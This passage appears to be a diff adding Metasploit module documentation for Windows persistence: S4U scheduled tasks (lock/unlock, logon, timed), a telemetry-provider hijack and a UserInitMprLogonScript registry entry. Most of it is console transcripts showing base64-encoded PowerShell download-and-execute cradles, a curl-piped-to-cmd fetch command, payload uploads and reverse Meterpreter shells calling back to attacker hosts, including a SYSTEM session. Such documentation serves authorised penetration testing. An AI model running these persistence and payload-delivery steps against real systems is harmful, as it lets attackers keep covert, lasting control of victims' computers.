[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49557) at 2025-12-27 07:27:55 -0500
[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:49558) at 2025-12-27 07:27:55 -0500
[*] Meterpreter session 6 opened (1.1.1.1:4444 -> 2.2.2.2:49561) at 2025-12-27 07:27:57 -0500
```
@@ -0,0 +1,126 @@
## Vulnerable Application
Creates a scheduled task that will run using service-for-user (S4U).
This allows the scheduled task to run even as an unprivileged user
that is not logged into the device. This will result in lower security
context, allowing access to local resources only. The module
requires 'Logon as a batch job' permissions (SeBatchLogonRight).
This triggers on either a lock or unlock of the workstation.
## Verification Steps
1. Start msfconsole
2. Get a user level shell
3. Do: `use exploit/windows/persistence/service_for_user/lock_unlock`
4. Do: `set session #`
5. Do: `run`
6. Lock or unlock the system
7. You should eventually get a shell.
## Options
### TRIGGER
Payload trigger method. Defaults to `unlock`, choices are: `lock`, `unlock`
### EXPIRE_TIME
Number of minutes until trigger expires. Defaults to `0`
### PAYLOAD_NAME
Name of payload file to write. Random string as default.
### TASK_NAME
The name of task. Random string as default.
## Scenarios
### Windows 7 (6.1 Build 7601, Service Pack 1)
Initial shell
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 2
target => 2
resource (/root/.msf4/msfconsole.rc)> set srvport 8085
srvport => 8085
resource (/root/.msf4/msfconsole.rc)> set uripath w2
uripath => w2
resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4449
lport => 4449
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 1.1.1.1:4449
[*] Using URL: http://1.1.1.1:8085/w2
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABiAFcAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAYgBXAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAYgBXAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBhADMAVwAwAEYAMQB1ADYARABKAHQAMQBuACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAuADIAMgA4ADoAOAAwADgANQAvAHcAMgAnACkAKQA7AA==
msf exploit(multi/script/web_delivery) >
[*] 2.2.2.2 web_delivery - Powershell command length: 3712
[*] 2.2.2.2 web_delivery - Delivering Payload (3712 bytes)
[*] Sending stage (230982 bytes) to 2.2.2.2
msf exploit(multi/script/web_delivery) > [*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:49801) at 2025-12-26 16:44:47 -0500
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WINDOWS7
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x64/windows
meterpreter > getuid
Server username: windows7\windows
meterpreter > background
[*] Backgrounding session 1...
```
Install persistence
```
msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/service_for_user/lock_unlock
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/service_for_user/lock_unlock) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/service_for_user/lock_unlock) > set session 1
session => 1
msf exploit(windows/persistence/service_for_user/lock_unlock) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(windows/persistence/service_for_user/lock_unlock) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Target is likely exploitable
[*] Uploading C:\Users\windows\AppData\Local\Temp\gJBmPcpAn.exe
[+] Successfully Uploaded remote executable to C:\Users\windows\AppData\Local\Temp\gJBmPcpAn.exe
[+] Successfully wrote XML file to C:\Users\windows\AppData\Local\Temp\fGMeBGOMRYMUd.xml
[+] Persistence task oftkeQLa created successfully
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WINDOWS7_20251226.4527/WINDOWS7_20251226.4527.rc
```
Lock the system, and unlock it
```
msf exploit(windows/persistence/service_for_user/lock_unlock) >
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49802) at 2025-12-26 16:45:58 -0500
```
@@ -0,0 +1,120 @@
## Vulnerable Application
Creates a scheduled task that will run using service-for-user (S4U).
This allows the scheduled task to run even as an unprivileged user
that is not logged into the device. This will result in lower security
context, allowing access to local resources only. The module
requires 'Logon as a batch job' permissions (SeBatchLogonRight).
This triggers on event 4101 which validates the Windows license after logon.
## Verification Steps
1. Start msfconsole
2. Get a user level shell
3. Do: `use exploit/windows/persistence/service_for_user/logon`
4. Do: `set session #`
5. Do: `run`
6. Log in to the system
7. You should eventually get a shell.
## Options
### EXPIRE_TIME
Number of minutes until trigger expires. Defaults to `0`
### PAYLOAD_NAME
Name of payload file to write. Random string as default
### TASK_NAME
The name of task. Random string as default.
### Windows 7 (6.1 Build 7601, Service Pack 1)
Initial shell
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 2
target => 2
resource (/root/.msf4/msfconsole.rc)> set srvport 8085
srvport => 8085
resource (/root/.msf4/msfconsole.rc)> set uripath w2
uripath => w2
resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4449
lport => 4449
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 1.1.1.1:4449
[*] Using URL: http://1.1.1.1:8085/w2
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABmAGwAagBXAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAGYAbABqAFcALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABmAGwAagBXAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBnAFgASwBQADcAawBpADIATwBUAFUARQBOACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAuADIAMgA4ADoAOAAwADgANQAvAHcAMgAnACkAKQA7AA==
msf exploit(multi/script/web_delivery) >
[*] 2.2.2.2 web_delivery - Powershell command length: 3694
[*] 2.2.2.2 web_delivery - Delivering Payload (3694 bytes)
[*] Sending stage (230982 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:49789) at 2025-12-26 16:23:40 -0500
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WINDOWS7
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: windows7\windows
meterpreter > background
[*] Backgrounding session 1...
```
Install persistence
```
msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/service_for_user/logon
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/service_for_user/logon) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/service_for_user/logon) > set session 1
session => 1
msf exploit(windows/persistence/service_for_user/logon) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(windows/persistence/service_for_user/logon) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Target is likely exploitable
[*] Uploading C:\Users\windows\AppData\Local\Temp\QmJIhshGLWM.exe
[+] Successfully Uploaded remote executable to C:\Users\windows\AppData\Local\Temp\QmJIhshGLWM.exe
[*] This triggers on event 4101 which validates the Windows license after logon
[+] Successfully wrote XML file to C:\Users\windows\AppData\Local\Temp\YAIHto.xml
[+] Persistence task YKgnVyDO created successfully
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WINDOWS7_20251226.2718/WINDOWS7_20251226.2718.rc
```
Logout and log back in
```
msf exploit(windows/persistence/service_for_user/logon) > [*] 2.2.2.2 - Meterpreter session 1 closed. Reason: Died
msf exploit(windows/persistence/service_for_user/logon) > [*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49792) at 2025-12-26 16:29:21 -0500
```
@@ -0,0 +1,139 @@
## Vulnerable Application
Creates a scheduled task that will run using service-for-user (S4U).
This allows the scheduled task to run even as an unprivileged user
that is not logged into the device. This will result in lower security
context, allowing access to local resources only. The module
requires 'Logon as a batch job' permissions (SeBatchLogonRight).
Creates a scheduled task to run the payload ever FREQUENCY minutes for
the duration of EXPIRE_TIME.
## Verification Steps
1. Start msfconsole
2. Get a user level shell
3. Do: `use exploit/windows/persistence/service_for_user/schedule`
4. Do: `set session #`
5. Do: `run`
6. You should eventually get a shell.
## Options
### FREQUENCY
Frequency in minutes to execute. Defaults to `60`
### EXPIRE_TIME
Number of minutes until trigger expires. Defaults to `0`
### PAYLOAD_NAME
Name of payload file to write. Random string as default.
### TASK_NAME
The name of task. Random string as default.
## Scenarios
### Windows 7 (6.1 Build 7601, Service Pack 1)
Initial shell
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.18
lhost => 1.1.1.18
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 2
target => 2
resource (/root/.msf4/msfconsole.rc)> set srvport 8085
srvport => 8085
resource (/root/.msf4/msfconsole.rc)> set uripath w2
uripath => w2
resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4449
lport => 4449
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 1.1.1.18:4449
[*] Using URL: http://1.1.1.18:8085/w2
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABtADMAQQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAHsAJABtADMAQQAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAkAG0AMwBBAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBlAFAAVQBlAFUATQBBAHMANAB4AGEAbgByAHkAMQAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIAJwApACkAOwA=
msf exploit(multi/script/web_delivery) >
[*] 2.2.2.2 web_delivery - Powershell command length: 3726
[*] 2.2.2.2 web_delivery - Delivering Payload (3726 bytes)
[*] Sending stage (230982 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.18:4449 -> 2.2.2.2:49760) at 2025-12-26 15:35:16 -0500
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WINDOWS7
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: windows7\windows
meterpreter > background
[*] Backgrounding session 1...
```
Install persistence
```
msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/service_for_user/schedule
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/service_for_user/schedule) > set frequency 5
frequency => 5
msf exploit(windows/persistence/service_for_user/schedule) > set expire_time 7
expire_time => 7
msf exploit(windows/persistence/service_for_user/schedule) > set session 1
session => 1
msf exploit(windows/persistence/service_for_user/schedule) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/service_for_user/schedule) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.18:4444
msf exploit(windows/persistence/service_for_user/schedule) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Target is likely exploitable
[*] Uploading C:\Users\windows\AppData\Local\Temp\BruDqCGH.exe
[+] Successfully Uploaded remote executable to C:\Users\windows\AppData\Local\Temp\BruDqCGH.exe
[+] Successfully wrote XML file to C:\Users\windows\AppData\Local\Temp\KSPbcFQO.xml
[+] Persistence task LVNzSUTTA created successfully
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WINDOWS7_20251226.3810/WINDOWS7_20251226.3810.rc
msf exploit(windows/persistence/service_for_user/schedule) > date
[*] exec: date
Fri Dec 26 03:38:13 PM EST 2025
```
Wait
```
msf exploit(windows/persistence/service_for_user/schedule) >
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.18:4444 -> 2.2.2.2:49768) at 2025-12-26 15:43:03 -0500
msf exploit(windows/persistence/service_for_user/schedule) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: windows7\windows
```
@@ -0,0 +1,148 @@
## Vulnerable Application
This persistence mechanism installs a new telemetry provider for windows. If telemetry is turned on,
when the scheduled task launches, it will execute the telemetry provider and execute our payload
with system permissions.
## Verification Steps
1. Start msfconsole
2. Get an admin level shell on windows
3. Do: `use exploit/windows/persistence/telemetry`
4. Do: `set session #`
5. Do: `run`
6. You should get a shell when the scheduled task runs.
## Options
### PAYLOAD_NAME
Name of payload file to write. Random string as default.
### NAME
Name of the telemetry program. Random string as default.
## Scenarios
### Windows 10 1909 (10.0 Build 18363)
Get an admin level shell
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:50293) at 2026-01-03 13:12:03 -0500
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 1909 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
```
Install persistence
```
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/telemetry
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/telemetry) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/telemetry) > set session 1
session => 1
msf exploit(windows/persistence/telemetry) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/telemetry) >
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Appraiser name found: Microsoft Compatibility Appraiser
[+] Next scheduled runtime: 1/4/2026 4:10:25 AM
[*] Checking registry write access to: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\qIJwhRtzyhRm
[+] The target is vulnerable. Registry writable
[+] Writing payload to C:\Users\windows\AppData\Local\Temp\blaWvMM.exe
[*] Using telemetry id: uYmoknDG
[+] Persistence installed! Call a shell immediately using 'schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"' (SYSTEM) or CompatTelRunner.exe (user)
or wait till 1/4/2026 4:10:25 AM (SYSTEM)
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260103.2023/WIN10PROLICENSE_20260103.2023.rc
```
Trigger the scheduled task instead of waiting
```
msf exploit(windows/persistence/telemetry) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2344 created.
Channel 4 created.
Microsoft Windows [Version 10.0.18363.2274]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
SUCCESS: Attempted to run the scheduled task "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser".
C:\WINDOWS\system32>exit
meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/persistence/telemetry) > date
[*] exec: date
Sat Jan 3 01:30:05 PM EST 2026
msf exploit(windows/persistence/telemetry) >
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50305) at 2026-01-03 13:30:51 -0500
msf exploit(windows/persistence/telemetry) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows WIN10PROLICENSE\windows @ WIN10PROLICENSE 1.1.1.1:4450 -> 2.2.2.2:50293 (2.2.2.2)
2 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10PROLICENSE 1.1.1.1:4444 -> 2.2.2.2:50305 (2.2.2.2)
```
@@ -0,0 +1,237 @@
## Vulnerable Application
### Windows Persistence via HKCU UserInitMprLogonScript
This module establishes persistence by leveraging the per-user registry value:
HKCU\Environment\UserInitMprLogonScript
The module writes a payload executable to disk and sets the
`UserInitMprLogonScript` value so that the payload executes when the user
logs in.
Unlike the traditional `Winlogon\Userinit` (HKLM) technique, this method:
* Does not require administrative privileges
* Does not modify system-wide registry keys
* Only affects the current user
* Executes during interactive user logon
The payload will execute when the user signs out and logs back in.
## Verification Steps
1. Start `msfconsole`
2. Obtain a meterpreter session on a Windows target (user-level is sufficient)
3. `use exploit/windows/persistence/userinit_mpr_logon_script`
4. `set SESSION <id>`
5. `set LHOST <attacker_ip>`
6. `set LPORT <attacker_port>`
7. `run`
8. Sign out from the Windows session
9. Log back in
10. A new meterpreter session should be created
## Options
### SESSION (Required)
The session to run this module on.
### LHOST (Required)
The local host to receive the reverse connection.
### LPORT (Required)
The local port to receive the reverse connection.
### PAYLOAD_NAME
The filename to use when writing the payload to disk.
If not specified, a random filename will be generated.
## Scenarios
### Initial Session
```
msf > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST 172.21.176.212
LHOST => 172.21.176.212
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://172.21.176.212:4444
[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Without a database connected that payload UUID tracking will not work!
[*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Staging x64 payload (233052 bytes) ...
[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (172.21.176.212:4444 -> 172.21.176.1:62359) at 2026-03-01 05:45:19 +0200
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/win NERO\DELL @ NERO 172.21.176.212:4444 ->
dows 172.21.176.1:62359 (172
.21.176.1)
```
### Install Persistence
```
msf exploit(multi/handler) > use exploit/windows/persistence/userinit_mpr_logon_script
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/userinit_mpr_logon_script) > set SESSION 1
SESSION => 1
msf exploit(windows/persistence/userinit_mpr_logon_script) > set LHOST 172.21.176.212
LHOST => 172.21.176.212
msf exploit(windows/persistence/userinit_mpr_logon_script) > set LPORT 4444
LPORT => 4444
msf exploit(windows/persistence/userinit_mpr_logon_script) > set PAYLOAD_NAME updater
PAYLOAD_NAME => updater
msf exploit(windows/persistence/userinit_mpr_logon_script) > set WRITABLEDIR C:\\Users\\DELL\\AppData\\Roaming
WRITABLEDIR => C:\Users\DELL\AppData\Roaming
msf exploit(windows/persistence/userinit_mpr_logon_script) > set CleanUpRc true
CleanUpRc => true
msf exploit(windows/persistence/userinit_mpr_logon_script) > set VERBOSE true
VERBOSE => true
msf exploit(windows/persistence/userinit_mpr_logon_script) > check
[+] The target is vulnerable. Registry path is writable
msf exploit(windows/persistence/userinit_mpr_logon_script) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/userinit_mpr_logon_script) >
[-] Handler failed to bind to 172.21.176.212:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Registry path is writable
[+] Writing payload to C:\Users\DELL\AppData\Roaming\updater.exe
